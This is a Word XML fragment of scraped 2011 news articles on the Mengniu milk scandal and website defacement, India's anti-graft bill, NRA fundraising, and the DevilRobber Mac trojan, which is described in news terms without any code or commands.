        <w:t>http://www.businessweek.com/news/2011-12-29/actavis-to-pay-84-million-to-end-medicaid-drug-pricing-suit.html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Mengniu Falls as Website Hacked Amid Tainted Milk Scandal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29, 2011, 4:03 AM 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BRIC Decade Ends With Record Fund Outflows as Growth Slows China Milk Producer MengniuБ─(tm)s Website Hacked After Toxin Found Mengniu Plunges Most Since September 2008 on Tainted Milk China 2012 Rare-Earth Export Quota Almost Level With This Year Mildewed Feed Caused Tainted Mengniu Milk, Regulator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closing share price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 29 (Bloomberg) - China Mengniu Dairy Co., the nation's largest milk producer, fell to the lowest in more than two years in Hong Kong trading after hackers accessed its website amid a scandal over contaminated milk from the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Mengniu dropped 7.4 percent to HK$18.52, the lowest since Sept. 4, 2009, at the 4 p.m. close of trading on the city's stock exchange. The Hang Seng Index lost 0.7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are selling the stock on expectations consumers will stay away from Mengniu's products, according to Jason Yuan, an analyst at UOB Kay Hian Holdings Ltd. Mengniu shares plunged 24 percent yesterday, the biggest one-day drop since September 2008, after Chinese regulators found excessive levels of a toxin in its milk.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users have called for a boycott of Mengniu's products," Yuan said in a telephone interview from Shanghai. "We believe some consumers could give up drinking milk or switch to other brands, which will affect Mengniu's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Mengniu's website showed that it had been affected by unauthorized access as early as 11:26 p.m. local time yesterday and was restored to normal after midnight. Hackers changed the title of mengniu.com.cn to "Hacked By:Drift" and posted a message saying "Mengniu once made the Chinese people strong and proud, but now it's doing harm to its own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call to the mobile phone of Lu Jianjun, a Mengniu spokesman, was answered by a woman, who said Lu was in a meeting. She declined to be identified or comment further.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Above-Standard Levels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General Administration of Quality Supervision, Inspection and Quarantine found above-standard amounts of a toxin in a batch of Mengniu milk products and another from closely held Fujian Changfu Dairy Industry Group Co. during a random inspection, according to test results released on the regulator's website Dec. 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Moldy feed given to cows led to the excessive levels, Mengniu said Dec. 28. The company has destroyed the contaminated products and will strengthen its quality control, Mengniu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discovery adds to food scandals in China that include an illegal additive to pork products this year and melamine- tainted formula milk in 2008 that killed at least six infants and sickened 300,000 nationwide. China's government has shut 5,000 companies, arrested 2,000 people, and handed down at least one death sentence in a crackdown on food safety in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Modern Dairy Holdings Ltd., a milk supplier that got 97 percent of revenue from Mengniu in the year ended June. 30, rose 1.9 percent to HK$1.58, after falling 13 percent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believes its products aren't involved in the Mengniu contamination incident, Modern Dairy said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--Michael Wei. Editors: Lena Lee, Dave McCombs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Michael Wei in Shanghai at mwei13@bloomberg.net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Stephanie Wong at swong139@bloomberg.net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Three Types of People to Fire Immediately Top B-School Stories of 2011 Is It Time for Apple's Patent War to End?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It's Always Sunny in Silicon Valley Where Greece Is Right and Germany Is Wrong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Where Greece Is Right and Germany Is Wrong Three Types of People to Fire Immediately It's Always Sunny in Silicon Valley Bitcoins: Currency of the Geeks You Deserve the Team You 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Intel Prepares to Close Philippine Plant The $32,000 Startup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Most Expensive U.S. Homes Sold in 2011 Best Places to Launch a Career The Most Expensive Small Towns in America America's 50 Best Cities World's Most Expensive Cities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 Occupiers and Evicters Special Report Focus On Entrepreneurs, November 2011 Video Swiss Ski Resort Adapting to Strong Franc Slide Show Black Swans of 2011 Special Report Charlie Rose Talks to... Video Munster Says Apple Shares May Rise to $607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Canadian Business The Hong Kong Stock Exchange Ticketmaster Entertainment Inc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mortgage Lenders Artificial Intelligence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Fix This/Transportation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@BW on Twitter BW on Facebook Blogs EconoChat EuroCrisis Joshua Green on Politics Occupy Wall Street Small Business Technology [+] Rate this page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 Subscribe Now</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2011.12.29 11:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-12-29/mengniu-falls-as-website-hacked-amid-tainted-milk-scandal.html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India's Upper House Debates Graft Law in Singh's Last Hurdle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29, 2011, 3:07 AM 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JapanБ─(tm)s Ruling Party Struggles to Complete Tax Plan Amid Dissent China Punishes 54 Officials Over Fatal High-Speed Rail Crash SinghБ─(tm)s Graft Bill Faces Final Hurdle as Hazare Ends Fast Wen Urges Protection for Farmer Rights, Stop to Land Grabs HazareБ─(tm)s Fast Prods Lawmakers as Indian Graft Debate Begins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Bibhudatta Pradhan and Andrew MacAskill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debate starting from first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 29 (Bloomberg) - Indian upper house lawmakers debated a bill to curb corruption as Prime Minister Manmohan Singh fights to secure its passage after activist Anna Hazare ended his public fast early amid signs he may be losing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Approval in the upper chamber, where the ruling coalition is 28 seats short of a majority, is the final hurdle for legislation Singh is seeking to end a year of protests over alleged graft that have weakened his government, stalled policy making as Asia's third largest economy slowed and led to the jailing of a minister and business executives.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has wasted an enormous amount of time trying to pass this bill at the expense of other policies," said Sudha Pai, a professor at the Centre for Political Studies at Jawaharlal Nehru University in New Delhi. "It highlights their weakness."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must win the support of independent and regional lawmakers to clear the bill in the upper house, or Rajya Sabha. The bill, known as the Lokpal, passed in the lower house Dec. 27. An extended session of parliament ends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Opening the debate in Parliament, Arun Jaitley, a leader of the main opposition Bharatiya Janata Party, branded the bill "half-hearted" legislation. "Are they only willing to proclaim or are they ready to strike" against the corrupt, Jaitley said in a speech.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Singh's government defeated Dec. 27 attempts by lower house lawmakers from several parties to give the proposed anti-graft ombudsman overall control of the country's main criminal investigation agency, also a key demand of Hazare who argues it is the only way to ensure the new body has the powers to probe and punish those accused of corruption.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Junior Officials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anti-graft agency Singh's government wants to create will be able to scrutinize the prime minister except over issues of national security. It won't have direct oversight of junior bureaucrats responsible for everyday acts of petty corruption that hinder business and effective governance.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passed by the lower house included changes that require the assent of state governments before a Lokpal agency can be set up at the provincial level. It was unclear if this would be enough for government allies like Mamata Banerjee's Trinamool Congress who fear a dilution of state powers.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Hazare, 73, called off his protest yesterday as supporters expressed concerns over his health and crowds at the fast venue in Mumbai fell to a few thousand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Fast Tactics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Hazare, who based his campaign on the hunger strikes used by independence icon Mahatma Gandhi leading to charges he was holding a democratic government to ransom, dismissed the graft bill as too weak and vowed to protest against those who had "betrayed the nation." His supporters will target Singh's Congress party before elections early next year,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polls loom in five states, including in the country's most populous province of Uttar Pradesh where Congress heir apparent Rahul Gandhi is leading campaigning, Singh needs to cap the damage done by graft scandals. They have included charges linked to a 2008 sale of mobile-phone airwaves, for which former telecommunications minister Andimuthu Raja is among those on trial, and last year's Commonwealth Games.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Reserve Bank of India Governor Duvvuri Subbarao signaled on Dec. 16 that the country's $1.7 trillion economy may expand less than an earlier estimate of 7.6 percent this fiscal year. Factory output fell 5.1 percent in October from a year earlier, the first contraction since 2009, data showed Dec.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government is defeated in the upper house it will either have to shelve the legislation or call a rare joint session of parliament to forge a consensus. If the bill is passed with some changes, Singh will need to take it back to the lower house for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Singh's administration will need a repeat of events in the lower house Dec. 27 when lawmakers of the Samajwadi Party, Bahujan Samaj Party and Rashtriya Janata Dal walked out of the chamber before voting began.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Mark Williams in New Delhi. Editors: Mark Williams, Abhay Singh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Bibhudatta Pradhan in New Delhi at bpradhan@bloomberg.net; Andrew Macaskill in New Delhi at amacaskill@bloomberg.net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Hirschberg at phirschberg@bloomberg.net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Three Types of People to Fire Immediately Top B-School Stories of 2011 Is It Time for Apple's Patent War to End?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It's Always Sunny in Silicon Valley Where Greece Is Right and Germany Is Wrong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Where Greece Is Right and Germany Is Wrong Three Types of People to Fire Immediately It's Always Sunny in Silicon Valley Bitcoins: Currency of the Geeks Selling Healthy Snacks in Schools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$32,000 Startup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Most Expensive U.S. Homes Sold in 2011 The Most Expensive Small Towns in America Best Places to Launch a Career America's 50 Best Cities World's Most Expensive Cities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 Occupiers and Evicters Special Report Focus On Entrepreneurs, November 2011 Video Swiss Ski Resort Adapting to Strong Franc Slide Show Black Swans of 2011 Special Report Charlie Rose Talks to... Video Munster Says Apple Shares May Rise to $607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Housing Market Business of Law Business Law Employment Law Corporate Legal Departments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Fix This/Transportation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@BW on Twitter BW on Facebook Blogs EconoChat EuroCrisis Joshua Green on Politics Occupy Wall Street Small Business Technology [+] Rate this page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 Subscribe Now</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2011.12.29 10:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-12-29/india-s-upper-house-debates-graft-law-in-singh-s-last-hurdle.html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NRA Raises $200 Million as Gun Lobby Toasters Burn Logo on Bread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29, 2011, 3:07 AM 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Perry Asks Court to Block Printing of Virginia Primary Ballots Schwarzman-Romney 24-Times Return Inciting DemocratsБ─(tm) Scrutiny House Republicans Have Few Options to Resolve Tax-Cut Fight Boehner on Defensive Again as Rebellion Imperils Tax Cut First Solar Outspent BP in California While Building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Peter Robison and John Crewdson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 29 (Bloomberg) - A toaster that burns the National Rifle Association's logo onto bread fetched $650 at an auction last month, just one reflection of the money-making power in the gun group's brand.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 which began as a grassroots organization dedicated to teaching marksmanship, enters the 2012 election season as a lobbying, merchandising and marketing machine that brings in more than $200 million a year and intends to help unseat the incumbent president. From 2004 to 2010, the group's revenue from fundraising - including gifts from gun makers who benefit from its political activism - grew twice as fast as its income from members' dues, according to NRA tax returns.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50 firearms-related companies have given at least $14.8 million to the Fairfax, Virginia-based group, according to the NRA's own list for a donor program that began in 2005. That same year, NRA lobbyists helped win passage of a federal law that limited liability claims against gun makers. Former NRA President Sandy Froman wrote that it "saved the American gun industry from bankruptcy."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organizations which start out controlled by industry and created by industry, like lobbying groups for coal or oil, they really started out as a grassroots organization and became an industry organization," said William Vizzard, a former agent of the Bureau of Alcohol, Tobacco and Firearms who's now a professor of criminal justice at California State University in Sacramento. He studied the NRA for a 2000 book on gun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Going After Obama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group's latest political objectives is to get President Barack Obama out of office next year, even as gun- control advocates express disappointment in his administration. Obama has done little to "confront the core weaknesses in our gun laws," said Dennis Henigan, acting president of the Brady Center to Prevent Gun Violence.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didn't stop NRA Executive Vice President Wayne LaPierre from citing what he called "a massive Obama conspiracy to deceive voters and hide his true intentions to destroy the Second Amendment in our country" during a September speech to the Conservative Political Action Conference in Orlando. LaPierre said the NRA would work to defeat Obama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 funds its educational and political missions in part with contributions, merchandise sales and various sponsorship deals and "affinity" partnerships. A short-lived company that helped H&amp;R Block Inc. market tax services to NRA members in 2001 had financial ties to wives of NRA executives and the association's treasurer, court records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Sources of Income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Combined, sources such as fundraising, sales, advertising and royalties produced about $115 million in 2010, just over half the NRA's $227.8 million in income, according to the group's tax return. Most of the rest, about $100.5 million, came from membership dues. Other sources included program fees, sales of assets, investment income and subscriptions.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businesslike approach extends to the NRA Foundation, an affiliated charity that files separate tax returns and last year distributed $21.2 million in grants - including $12.6 million to the NRA itself. At least $5.5 million went to hundreds of local recipients, including 4-H organizations, shooting clubs and university rifle teams. In 2010, the foundation began requiring many such grantees to spend their cash gifts at its own online "merchandise center."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Grant Discrepancies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Representatives of four recipients told Bloomberg News they received less than the foundation reported giving them on its 2010 tax return. Failing to provide correct information to the Internal Revenue Service could subject a tax-exempt organization to fines of $100 a day, said David S. Miller, a tax attorney with Cadwalader, Wickersham &amp; Taft LLP in New York. If there's a reasonable explanation for inaccuracies, the law doesn't impose a penalty,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LaPierre declined requests for an interview. Andrew Arulanandam, the association's chief spokesman, e-mailed the following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 will not participate in agenda journalism driven by a news organization owned by an avowed enemy of the Second Amendment - a politician who has been aggressively working against the interests of the NRA, our members and the nation's gun owners for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Mayor Michael R. Bloomberg is the majority owner of Bloomberg LP, the parent company of Bloomberg News. He is co- chairman of Mayors Against Illegal Guns, a 600-member coalition that advocates tightening required background checks of gun buyers. Under Bloomberg's administration, New York sent undercover investigators to gun shows where they purchased firearms without such checks, according to city reports. This month, the city announced that 77 of 125 online gun sellers agreed to make sales even after an undercover buyer said he "probably could not pass" a background check.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‘Cavernous Loopholes'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mayor and the coalition support the Second Amendment and legal gun ownership, but we have proven time and again that our laws are either not enforced or have cavernous loopholes, resulting in dangerous people acquiring guns and committing crimes," said Marc La Vorgna, a Bloomberg spokesman. "Polling shows the majority of actual NRA members - as opposed to their Washington lobbyists - support the coalition's efforts to keep weapons from ending up in the wrong hands through better enforcement and common-sense laws."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has not had a role in the day-to-day operation of Bloomberg LP for more than a decade, La Vorgna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Membership Numbers Vary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NRA members is unclear. One NRA website says it's "approximately 4.3 million." On another, it's "nearly four million." A "sponsorship prospectus" for the group's 2012 annual meeting offers ad placements in e-mails that will be sent to the "house file of 2 million NRA members."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2 million are "our most active and interested members," the prospectus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its modern incarnation as a political force, the NRA was mostly identified with promoting rifle sports. Dismayed by their troops' lack of marksmanship in the Civil War, Union veterans Colonel William C. Church and General George Wingate formed the group in 1871, according to an NRA history. For decades the only mention of the group in the New York Times concerned results of its sanctioned shooting matches.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association established a legislative affairs division in 1934, it didn't begin lobbying until the mid-1970s as gun-control laws emerged after the political assassinations of the 1960s. In the 2000 presidential campaign, the NRA's opposition to Al Gore hurt him in his home state of Tennessee and contributed to his loss in the presidential race to George W. Bush, according to former President Bill Clinton.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Perceived Threat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 brought its own challenges, according to Richard Feldman, a former lobbyist for the association.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no perceived national threat to gun ownership" after Bush was elected, said Feldman, who wrote a 2007 book titled "Ricochet: Confessions of a Gun Lobbyist." "The NRA's membership dropped to under two-and-a-half million, although they never admitted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NRA member Joe Gregory, the former vice chairman of Bristol, Tennessee- based King Pharmaceuticals Inc., said he pitched the idea of soliciting deep-pocketed donors during a 2003 conversation with LaPierre, the executive vice president.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LaPierre was "talking about how proud he was of the association and how it was built on the strength of $10 and $25 donations," Gregory recalled during an interview he gave to an NRA-produced radio program in April. He said he responded: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with over 4 million members, there's got to be a few people who've been fortunate to be blessed to live and work and prosper in this country and they can give more than $25. And we ought to look for ways that we can encourage them to do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‘Ring of Freedom'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NRA's "Ring of Freedom," a donor-recognition program, began in 2005, according to the association's website. The NRA's Office of Advancement solicits contributions from companies, foundations and individuals.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Gregory, the chief executive officer of Gregory Management Co., an investment firm in Bristol, is part of a more exclusive group called the Golden Ring of Freedom. Its members, who have contributed at least $1 million, wear custom-tailored gold jackets at NRA gatherings. He referred questions to the NRA staff.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 received $71.1 million in donations last year, up 54 percent from $46.3 million in 2004, according to its federal tax returns.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Gun Makers Give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gun makers Sturm, Ruger &amp; Co.; Remington Arms Co. in Madison, North Carolina; and Smith &amp; Wesson Holding Corp. all contributed this year, according to news releases.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Sturm Ruger, of Southport, Connecticut, announced a goal in May to sell 1 million firearms by March 31 and donate $1 for each sold to the NRA. The company said last month that it expects to contribute $556,100 by Dec. 31. Remington became a "defender" sponsor of an NRA fundraising program, a designation that involves a $35,000 donation. Springfield, Massachusetts- based Smith &amp; Wesson signed on as the "exclusive pistol sponsor" of an NRA TV show; it's unclear how much the company paid.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NRA's 27 websites calls such donors "corporate partners," while another says the association is "not affiliated with any firearm or ammunition manufacturers or with any business that deals in guns and ammunition."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about the same time the NRA began seeking more in contributions, its lobbying arm, the Institute for Legislative Affairs, notched political successes that benefited the firearms industry. In 2004, ILA lobbyists helped ensure the end of the federal assault weapons ban; U.S. makers' annual rifle production has increased about 38 percent since, according to ATF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Lobbying Victories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2005, NRA lobbyists helped pass a law limiting liability claims against gun makers. Cities, led by New Orleans, had sought damages from such companies for health care costs and other expenses associated with gun violence. The "Protection of Lawful Commerce in Arms Act" helped end the suits, according to Mike Fifer, the CEO of Sturm Ruger.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 "which is one of the cornerstone achievements of the ILA, is probably the only reason we have a U.S. firearms industry anymore," Fifer told an NRA interviewer in May.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Sturm Ruger has benefited from another NRA lobbying effort, a decades-long campaign in U.S. statehouses for laws allowing permits to carry concealed weapons. After Wisconsin became the 49th state to allow such licenses in July, Fifer said on an earnings call that he expected a sales boost in the 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Doubled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Annual U.S. handgun production has more than doubled over the past decade. Sturm, Ruger was the leading U.S.-based producer in 2009, the most recent year for which the ATF has published data. Kevin Reid, general counsel for Sturm, Ruger, didn't return calls seeking comment. Representatives for other gun companies that gave to the NRA this year also didn't respond to requests for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Rank-and-file NRA members say they're unfazed by the organization's soliciting corporate contributions, or representing gun-makers' and gun- dealers' interests.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gun owner, I already support the firearms industry," said Bob E. Kelly, 59, an NRA member in Rindge, New Hampshire, in an e-mail. "I expect the NRA to solicit their support. And I expect the NRA to support them. How can I own guns if no one can manufacture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other organizations, the NRA has also tried to derive extra income from its members by selling corporations access to them. Affinity partnerships with various companies "have paid the NRA tens of millions of dollars in royalties," the association said in a 2003 court filing. NRA Treasurer Wilson Phillips and the spouses of two other NRA officials had financial ties to a for-profit company that marketed access to NRA members in 2001, court filings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 Service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Phillips was chief financial officer at Memberdrive.com Inc., records show. LaPierre's wife, Susan LaPierre, and Holly Marcario, the wife of NRA membership director Robert Marcario, worked there too, according to the documents. The company made a deal with the tax firm H&amp;R Block that paid Memberdrive a commission for new clients generated from the NRA's members. Memberdrive was to pay 70 percent of that commission to the NRA itself, records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protests from gun-control advocates led H&amp;R Block to cancel the partnership, Memberdrive in June 2002 sued HRB Management Inc., a subsidiary.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Held Stock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Phillips held stock in the startup, according to charitable-registration documents Memberdrive filed with the state of Washington in 2002. The company named Susan LaPierre one of its three highest-paid employees in a 2001 registration form filed with the same office. Memberdrive was sold for an undisclosed sum about a year after its lawsuit was dismissed in October 2003.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NRA officials declined to make Phillips, Marcario or Susan LaPierre available for this story. H&amp;R Block spokesman Gene King said the company doesn't comment on litigation.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 name on the NRA's list of corporate contributors is MidwayUSA, Inc., a Columbia, Missouri-based retailer of gun- related products, including ammunition and high-capacity magazines. It has contributed more than $6.5 million to the NRA and its lobbying arm since 1992, according to the company's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year, MidwayUSA owner Larry Potterfield began asking his customers to "round up" their purchases to the nearest dollar and donate the difference to the gun-rights group, according to the company's website. More than 50 other businesses have since joined the round-up program or a similar "add-a- buck" effort in which customers can contribute a dollar to the group at the point of purchase, the NRA says. Potterfield didn't return calls seeking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Dealer's Complaint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least one dealer, Champion Shooters Supply LLC, of New Albany, Ohio, isn't as happy with the NRA. The company, which deals in target-shooting equipment, complained last year that it was losing business because the NRA Foundation had established an online store where its grant recipients were required to purchase scores of commonly used items, including ammunition and targets.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items in the foundation's store were priced higher than at Champion Shooters Supply, according to a letter written by Susan D. Rector, an attorney for the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Spring, Champion Shooters began receiving inquiries from several of these clubs, that are its loyal customers, asking why they can no longer use NRA Foundation grant funds to purchase supplies and ammunition from Champion Shooters," the letter said. Rector declined to comment, as did Sandy Joost, the co-owner of Champion Shooters.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Goods'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2010, recipients were allowed to spend the foundation's grants where they chose. Under the new system, "we open a page on some website," said Richard Lynch, president of the True Sportsman Club near Sacramento, California, which received a $27,183 grant from the foundation last year. "That's where we do our shopping. It's the same stuff as before, except that there's no cash anymore. We just get the goods."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least 22 items in the online store are sold by Champion's Choice Inc., a dealer in LaVergne, Tennessee. Charles Pearson, the company's president, said his products were featured in the store because they're custom-made, and that his company was the sole source for them. Asked which of the products fit that description, he declined to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Miller, the tax lawyer with Cadwalader, Wickersham &amp; Taft, said he'd "never heard of anything remotely related to" a charity telling its grant recipients "that you have to purchase from a specific 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and Marcus Owens, an attorney with Caplin &amp; Drysdale in Washington, agreed that the arrangement might confer a private benefit on vendors who supply goods for the merchandise center.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Tax-Exempt Status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significant percentage of the NRA's grants could be spent only with a limited number of companies, "then it is very serious, perhaps sufficiently so to jeopardize tax-exempt status for the foundation," said Owens, who was the director of tax- exempt organizations for the Internal Revenue Service from 1990 to 2000.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year, the foundation granted at least $5.5 million to local clubs and organizations, according to its tax return. It's unclear how much was spent in the online merchandise center.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Representatives of four grant recipients said in interviews that they received lower amounts of grants in 2010 than the NRA Foundation reported giving them. The foundation reported a grant of $25,829 to the Whitney Rifle Club in Albemarle, North Carolina, on its 2010 tax return.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McSwain, Whitney's president, said in a telephone interview that the club had received $12,093.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Youth Programs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NRA told the IRS it gave $20,347 to Morganton, North Carolina, city officials to support youth programs. The city says it received $8,412, a difference of $11,935.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Oklahoma State University, which supports a number of youth shooting programs across the state, received $107,758 from the NRA Foundation during 2010, according to documents the university provided to Bloomberg News under its state open records law. The NRA Foundation told the IRS it gave OSU $125,778, a difference of $18,020. OSU officials said they had no explanation for the discrepancy.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Tom Slaughter, president of Arizona Outdoor Sports Inc. in Mesa, Arizona, said his group got $5,000 worth of ammunition for clay-target shooting last year from the NRA Foundation. The foundation reported giving Slaughter's group a $1,135 cash grant and $10,105 in non-cash assistance for "program materials."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‘Helping Kids'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believe all of those went through us," Slaughter said in an interview. He added: "I'm a volunteer. I'm good at helping kids. I'm good at working with kids. I'm a terrible accountant."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Accounting issues were far from the agenda at a Friends of NRA banquet at King Kamehameha's Kona Beach Hotel in Kailua- Kona, Hawaii, last month. Friends of NRA, billed as a nationwide, grassroots fundraising program for the NRA Foundation, holds more than 1,000 such events each year. It has a network of corporate sponsors as well, according to an NRA website. At the first "Friends" fundraiser in 1992, Potterfield of MidwayUSA played host.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dining on mahi-mahi and crab salad, attendees at the Friends dinner in Hawaii bid on firearms and hunting equipment. What really got them talking was the NRA toaster, said Glennon Gingo, who organized the dinner. It sold for $650,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Gingo joked that using the appliance is a great way to vet your social circle. "You can make ‘em toast in the morning and see how many friends you really have,"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understand that they're planning on putting out a waffle iron next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John Voskuhl, Robert L. Simison.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Peter Robison in Seattle at robison@bloomberg.net; John Crewdson in Washington at jcrewdson@bloomberg.net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Gary Putka at gputka@bloomberg.net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Three Types of People to Fire Immediately Top B-School Stories of 2011 Is It Time for Apple's Patent War to End?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It's Always Sunny in Silicon Valley Where Greece Is Right and Germany Is Wrong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Where Greece Is Right and Germany Is Wrong Three Types of People to Fire Immediately It's Always Sunny in Silicon Valley Bitcoins: Currency of the Geeks Selling Healthy Snacks in Schools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$32,000 Startup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Most Expensive U.S. Homes Sold in 2011 The Most Expensive Small Towns in America Best Places to Launch a Career America's 50 Best Cities World's Most Expensive Cities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 Occupiers and Evicters Special Report Focus On Entrepreneurs, November 2011 Video Swiss Ski Resort Adapting to Strong Franc Slide Show Black Swans of 2011 Special Report Charlie Rose Talks to... Video Munster Says Apple Shares May Rise to $607 in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Diet Industry Student Loans Research &amp; Development (R&amp;D) Canadian Business Exchange-Traded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Fix This/Transportation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@BW on Twitter BW on Facebook Blogs EconoChat EuroCrisis Joshua Green on Politics Occupy Wall Street Small Business Technology [+] Rate this page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 Subscribe Now</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2011.12.29 10:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-12-29/nra-raises-200-million-as-gun-lobby-toasters-burn-logo-on-bread.html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"Devil Robber" Trojan Infects Macs, Leeches Their GPUs for Bitcoin Profit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just works - except when you're infected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Inc. (AAPL) has long maligned the Windows PC as being virus laden, while promoting its own Mac computers as being immune to such evils. But despite this "It just works" publicity campaign, recent OS X malware [1][2][3][4] has forced Apple onto the defensive, silently rolling out tools to remove malicious programs from users' computers.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Malware Enslaves Unwitting Mac Users' GPUs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another piece of malware has struck unsuspecting Mac owners. The new multiplatform trojan, reported in the wild by security firms Sophos Security and Intego, is much more sophisticated than most of the past malware to hit the Mac platform.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malicious program installs as part of infected torrent downloads from sites such as The Pirate Bay. Thus far the malware has been primarily found to be piggybacking on pirated copies of the image editing app GraphicConverter version 7.4 (whose authors are not involved in the screen and do not approve of the pirating in the first place). The onboard malware is officially known in security circles as OSX/Miner-D, and is nicknamed the "DevilRobber".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 torrenters may find themselves the victim of a clever new trojan - as usual Apple remains silent on the issue. [Source: iQuid] Once installed on the victim's machine, the malware opens a back-door to the OS X system, allow remote command-and-control. It also monitors your computer, attempting to steal personal information like credit cards.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targets multiple platforms - including the Mac. [Source: Intego] To do this it takes screenshots. It also periodically dumps confidential information from various applications - such as truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history, and .bash_history - into the creatively named file dump.txt. It also records your username and passwords via monitoring using a proxy server (on port 34522 in the most common variant, but likely to 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its biggest target is the crypto-currency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DevilRobber trojan uses screen captures to steal your password and private information. [Source: Sophos] Bitcoins are a nation agnostic cyber-currency, beloved by hackers, internet aficionados, and libertarians (among others). In order to seed the initial distribution of "wealth" on the market, people can use computing resources to "mine" Bitcoins, via clients.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key part of DevilRobber is a Bitcoin mining Java program which the core trojan executes. The trojan enslaves the target's GPU to harvest Bitcoins. Due to the hard-to-trace nature of the cryptocurrency, the malware's authors can successfully obfuscate their identity and safeguard their profits.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mining program is often how the infection is first noticed, as it makes the system respond sluggishly, given the load it places on the GPU.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secondary tactic, the core trojan also attempts to access any unencrypted Bitcoin wallets it can find. It is unknown whether it contains code to access encrypted wallets, but it is reasonable to assume that future updates could deliver the ability to "crack" weakly encrypted wallet files. Compromised wallets transfer their Bitcoin riches to the attacker.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Curiously, the trojan also deletes any files leading pthc. This acronym is associated in internet forums with the phrase "pre-teen hardcore pornograph", aka child porn. It almost appears that the virus writers have attempted to do a bit of good amid all the evil they have created.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Lessons Learned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attack illustrates some of the issues surrounding both Apple computers and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[Sources: Bitcoin Forum (left); Nerd Merit Badges (right)] For Apple, it's yet another indication that company's public effort to feign ignorance on malware is harming customers. While tech-savvy Mac users understand their platforms are just as susceptible to infections as PCs, in theory if not in practice, less tech-savvy users often believe their Mac is magically immune to infection. This belief is perpetuated by Apple's advertisements and the company's technicians, which were revealed to be under orders to lie to customers -- feigning ignorance of infections. This approach has led to at least some of Apple's customers being victimized by the hacking community.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situation is only likely to get worse, as Apple refuses to publicly acknowledge the danger, as Microsoft has, for risk of losing its "it just works" public image. But currently in third place in computer sales by vendor, and with what some hackers say are weaker protections than Windows 7, interest in malicious Mac hacking is trending upwards.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Bitcoins, the cryptocurrency holds great promise, as it is formulated to prevent local government corruption, double spending, inflation, and ineffectual government monetary regulation. However, the Bitcoin market has been dealt a series of setbacks, both via the entrance of cybercriminals as large-scale miners, and from account breaches.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Bitcoin's largest exchange recently hacked, the currency's proponents have raced to safeguard their brainchild. More work clearly needs to be done to exclude cybercriminal miners, or Bitcoin risks being intimately associated with illegality.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Sources: Intego, Sophos Security</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2011.11.01 17:28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/Devil+Robber+Trojan+Infects+Macs+Leeches+Their+GPUs+for+Bitcoin+Profit/article23161.htm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New Mac Malware Part Trojan, Data Stealer, Spyware, BitCoin Miner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Fahmida Y. Rashid 2011-10-31 Article Rating: / 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user comments on this IT Security &amp; Network Security News &amp; Reviews story.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The latest malware targeting Mac OS X steals user credentials and computer processing power to generate more Bitcoins, a virtual currency used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Rate This Article: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Poor Best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PDF Version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researchers have uncovered yet another Mac Trojan in the wild, this time hiding inside pirated versions of the Mac OS X image editing application GraphicConverter.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pirated copy of GraphicConverter 7.4 is being actively distributed on file-sharing networks and torrent sites like Pirate Bay and contains the DevilRobber Trojan, Sophos researchers reported Oct. 29. Once on the Mac OS X, DevilRobber creates a backdoor for remote access and installs a Bitcoin miner that uses up spare system resources and steals the content of the user's Bitcoin wallet, according to Sophos.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anonymous, decentralized virtual currency commonly used online among people interested in keeping their transactions secret. The BitCoin value is determined on an online electronic exchange and generally hovers around $14 to $17 per unit. While often used for illegal transactions, BitCoins are used for legitimate purposes as well, such as making donations to WikiLeaks.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 Mac computer was infected by the malware, the first thing you might notice is performance becoming sluggish," Graham Cluley, senior technology consultant at Sophos, wrote on Naked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firm Intego said the malware has been spotted in other pirated Mac applications, but declined to identify the titles on the Mac Security blog. The applications were generally being distributed by BitTorrent, and Mac users should download only from trusted sites, Intego warned.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user has Little Snitch, a popular network traffic blocker, installed on the Mac, the Trojan terminates, Intego said. Otherwise, it will launch on each reboot or log-in.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application developers are "victims," as criminals are using their popular software as a trap to infect Mac users who download software from unofficial sources, Cluley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BitCoin users get in the business of "mining," or generating more of the currency to increase the pool of available funds. The mining is done with a specific application that runs mathematically intensive operations that require a lot of time and computer-processing resources. The DevilRobber Trojan "steals" processing power from infected Macs for this purpose.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this Mac malware is stealing computing time as well as data," Cluley wrote, noting that graphics 